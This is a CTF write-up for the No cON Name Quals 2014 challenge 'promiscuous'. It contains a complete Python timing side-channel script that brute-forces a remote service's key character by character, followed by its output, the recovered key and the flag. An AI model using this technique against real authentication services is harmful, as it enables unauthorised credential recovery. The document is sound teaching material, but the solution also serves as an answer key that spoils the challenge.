choppers

No cON Name Quals 2014: promiscuous

2014-09-15 00:00:01

Analysis

You are given an ip:port with no binary and told that the flag is 'NcN_' + sha1(key). The service seems to respond 'Invalid key' to any input. The only hint is that it there is a slight lag between entering a line and receiving a response.

$ nc 88.87.208.163 6969
test
Invalid key
??????
Invalid key

Vulnerability

The service is vulnerable to a time-based side channel attack. By measuring the time between request/response, one can determine the key one character at a time.

Exploit

#!/usr/bin/python

import socket
import time
import string
import operator


def time_key(sock, key):
    start = time.time()
    sock.send(key + "\n")
    rx = ""
    while rx.find("\n") == -1:
        rx += sock.recv(1024)
    if rx != "Invalid key\n":
        print "Key: ", repr(key)
        print "Response: ", repr(rx)
    end = time.time()
    print end - start, key
    return end - start


def find_next_char(sock, key):
    times = dict()
    keyspace = string.printable.replace("\n", "")
    keyspace = string.ascii_letters + string.digits
    for c in keyspace:
        t = time_key(sock, key+c)
        times[c] = t
    sorted_times = sorted(times.iteritems(), key=operator.itemgetter(1))
    print "done: ", sorted_times[-1]
    return sorted_times[-1][0]


def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    s.connect(("88.87.208.163", 6969))

    key = ""
    while True:
        key += find_next_char(s, key)
        print key


if __name__ == "__main__":
    main()

Output

$ ./promisc.py
....
2.96526098251 tIMeMaTTerO
2.98226809502 tIMeMaTTerP
2.88052296638 tIMeMaTTerQ
2.94008302689 tIMeMaTTerR
Key:  'tIMeMaTTerS'
Response:  'Yeah! You got it! :)\n'
3.12084317207 tIMeMaTTerS
^C

$ echo -n tIMeMaTTerS | shasum
15d07db12cd83174f0d19ce7e8c65a7c5ffba7df  -
$ echo NcN_15d07db12cd83174f0d19ce7e8c65a7c5ffba7df
NcN_15d07db12cd83174f0d19ce7e8c65a7c5ffba7df
$